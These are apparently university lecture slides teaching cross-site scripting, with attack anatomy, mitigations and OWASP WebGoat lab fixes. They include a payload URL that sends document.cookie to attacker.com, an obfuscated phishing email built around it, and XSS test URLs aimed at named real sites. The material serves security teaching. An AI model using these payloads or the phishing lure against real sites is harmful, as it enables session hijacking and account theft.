Cross Site Scripting (XSS)


Cross Site Scripting (XSS) Charles Frank Northern Kentucky University

Cross-Site Scripting (XSS)
The attacker causes a legitimate web server to send the user executable content (JavaScript, Flash ActionScript) of the attacker's choosing.
XSS is used to obtain the session ID for:
- a bank site (transfer money to the attacker)
- a shopping site (buy goods for the attacker)
- e-mail
Key ideas:
- The attacker sends malicious code to the server.
- The victim's browser loads the code from the server and runs it.
March 4, 2009 SIGCSE

Vulnerability Trends for 2006 (chart; trend data from MITRE CWE)

Anatomy of an XSS Attack
1. User logs into the legitimate site.
2. Site sends the user an authentication cookie.
3. Attacker sends the user an XSS attack containing injected code.
4. User clicks on the XSS link in e-mail, a web page, or IM.
5. Browser requests the vulnerable URL at the legitimate site; the authentication cookie is sent along with the request.
6. Legitimate site returns the injected code in its web page.
7. Browser runs the injected code, which requests the evil site with the cookie in the URL.
8. Evil site records the user's cookie.
9. Attacker uses the cookie to authenticate to the legitimate site as the user.

XSS Example
The client browser sends an error message to the web server:
https://example.com/error.php?message=Sorry%2C+an+error+occurred

XSS Example
The error message is "reflected" back from the web server to the client in a web page:
<p>Sorry, an error occurred.</p>

XSS Example
We can replace the error message with JavaScript:
https://example.com/error.php?message=<script>alert('xss');</script>

Proof of Concept

Exploiting the Vulnerability
The user logs in and is issued a cookie. The attacker feeds the user this URL:
https://example.com/error.php?message=<script>var+i=new+Image;+i.src="http://attacker.com/"%2bdocument.cookie;</script>

Exploiting the Vulnerability
The server responds by sending the user a web page that runs the JavaScript. The code makes a request to attacker.com containing the session token (the browser decodes + as a space and %2b as +, so the reflected script reads i.src="http://attacker.com/"+document.cookie).

Exploiting the Vulnerability
The attacker monitors requests to attacker.com. He uses the captured session token to gain access to the user's personal information and perform actions as the "user".

Email Snare
From: "Example Customer Services"
To: "J Q Customer"
Dear Valued Customer,
You have been selected to participate in our customer survey. Please complete our easy 5 question survey, and in return we will credit $5 to your account.

Email Snare
To access the survey, please log in to your account using your usual bookmark, and then click on the following link:
https://example.com/%65%72%72...?message%3d...att%61%63%6b.com...docum%65..%63ookie...

Reassuring Email
- The link contains the correct domain name (unlike phishing).
- The URL has been obfuscated.
- It uses https.

Reflected XSS
- Injected script is returned by a one-time message.
- Requires tricking the user into clicking on a link.
- Non-persistent: only works when the user clicks.

Anatomy of an XSS Attack (diagram: Attacker, User, Web Server, Evil site)
1. User logs in to the web server.
2. Web server sends the user a cookie.
3. Attacker prepares the XSS attack.
4. User clicks on the XSS link.
5. Browser sends the XSS URL to the web server.
6. Web server returns the page with injected code.
7. Browser runs the injected code; the evil site saves the session ID.
8. Attacker hijacks the user session.

XSS URL Examples
http://www.microsoft.com/education/?ID=MCTN&target=http://www.microsoft.com/education/?ID=MCTN&target="><script>alert(document.cookie)</script>
http://hotwired.lycos.com/webmonkey/00/18/index3a_page2.html?tw=<script>alert('Test');</script>
http://www.shopnbc.com/listing.asp?qu=<script>alert(document.cookie)</script>&frompage=4&page=1&ct=VVTV&mh=0&sh=0&RN=1
http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/im_search_exe?search_text=_%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

Stored XSS
- Injected script is stored in a comment, message, etc.
- Requires the ability to insert malicious code into web documents (comments, reviews, etc.).
- Persistent until the message is deleted.

Stored XSS
Consider an auction site that allows buyers to post questions and sellers to post responses. If an attacker can post a question containing a script, the attacker could get a user to bid without intending to, or get the seller to close the auction and accept the attacker's low bid.

Why does XSS Work?
Same-Origin Policy: the browser only allows JavaScript from site X to access cookies and other data from site X, so the attacker needs to make the attack come from site X.
Vulnerable Server Program: any program that returns user input without filtering out dangerous code.

XSS Attacks
MySpace worm (October 2005): when someone viewed Samy's profile, the script set him as a friend of the viewer and incorporated its code into the viewer's profile.
Paypal (2006): an XSS redirect was used to steal money from Paypal users in a phishing scam.
BBC, CBS (2006): by following an XSS link from securitylab.ru, you could read an apparently valid story on the BBC or CBS site claiming that Bush had appointed a 9-year-old as head of the Information Security department.

Impact of XSS
- Attackers can hijack user accounts.
- Attackers can hijack admin accounts too.
- The attacker can do anything the user can do.
- It is difficult to track down the source of the attack.

Mitigating XSS
- Disallow HTML input, or allow only safe HTML tags.
- Filter output: replace HTML special characters in output, e.g. replace < with &lt; and > with &gt;; also replace (, ), # and &.
- Tagged cookies: include the IP address in the cookie and only allow access from the original IP address the cookie was created for. (Caveat: users behind NAT or proxies share addresses and mobile users change them, so this is a weak control on its own.)

XSS Problem
XSS is a complex problem that is not going away anytime soon.
The browser is insecure by design: it understands JavaScript, and it isn't the browser's job to determine what code is good or bad.
Disabling scripting seriously dampens the user's browsing experience.

Cross-Site Scripting Demo

OWASP WebGoat
http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project
Downloads: WebGoat 5.2 Standard, WebGoat 5.2 Developer.
Run webgoat.bat to start Tomcat.
Enter http://localhost/WebGoat/attack in your browser.

OWASP WebGoat
Username: guest
Password: guest
Click Start WebGoat.

Reflected XSS Attacks
Solution:
1. Enter <script>alert('Bang!')</script> for the PIN value.
2. View Page Source.
3. Edit | Find | Bang

Stage 6: Blocked Reflected XSS
You have to edit org.owasp.webgoat.lessons.CrossSiteScripting.FindProfile.java and alter the method getRequestParameter. The body of the method should look something like this:

Stage 6: Blocked Reflected XSS
// body of getRequestParameter; needs import java.util.regex.Pattern;
// s and name are the method's own parameters
String regex = "[\\s\\w-,]*";    // allowlist: whitespace, word characters, '-' and ','
String parameter = s.getParser().getRawParameter(name);
Pattern pattern = Pattern.compile(regex);
validate(parameter, pattern);     // throws a ValidationException on any other character
return parameter;

Stage 1: Stored XSS
First log in as Tom with tom as the password. Select Tom from the list and click on the View Profile button. Tom's profile should now appear.

Stage 1: Stored XSS
Click on the Edit Profile button and try an XSS attack on the street field, for example:
<script>alert("Got Ya");</script>
Click on the UpdateProfile button and log out.

Stage 1: Stored XSS
Now log in as Jerry with jerry as the password. Select Tom's profile from the list and hit the ViewProfile button.

Stage 2: Blocked Stored XSS using Input Validation
Solution: you have to alter the method parseEmployeeProfile in the class UpdateProfile.java, which is in the package org.owasp.webgoat.lessons.CrossSiteScripting. The place to add code is marked.

Stage 2: Blocked Stored XSS using Input Validation
// needs import java.util.regex.Pattern;
String regex = "[\\s\\w-,]*";    // allowlist: whitespace, word characters, '-' and ','
String stringToValidate = firstName + lastName + ssn + title + phone
        + address1 + address2 + startDate + ccn + disciplinaryActionDate
        + disciplinaryActionNotes + personalDescription;
Pattern pattern = Pattern.compile(regex);
validate(stringToValidate, pattern);   // throws a ValidationException on any other character

Stage 2: Blocked Stored XSS using Input Validation
This validation allows the following:
\s = whitespace: space, \t, \n, \x0B, \f, \r
\w = word characters: a-z, A-Z, _, 0-9
and the characters - and ,
Use of any other character throws a ValidationException.

Stage 3: Stored XSS Revisited
Log in as David with david as the password. Choose Bruce from the list and click on the ViewProfile button.

Stage 4: Blocked XSS using Output Encoding
Use the static method encode(String s) in the class org.owasp.webgoat.util.HtmlEncoder. This method replaces all HTML special characters in the string with entities. Apply it in the getEmployeeProfile method of the org.owasp.webgoat.lessons.CrossSiteScripting class: replace every answer_results.getString(someString) with HtmlEncoder.encode(answer_results.getString(someString)) and you are done.

XSS References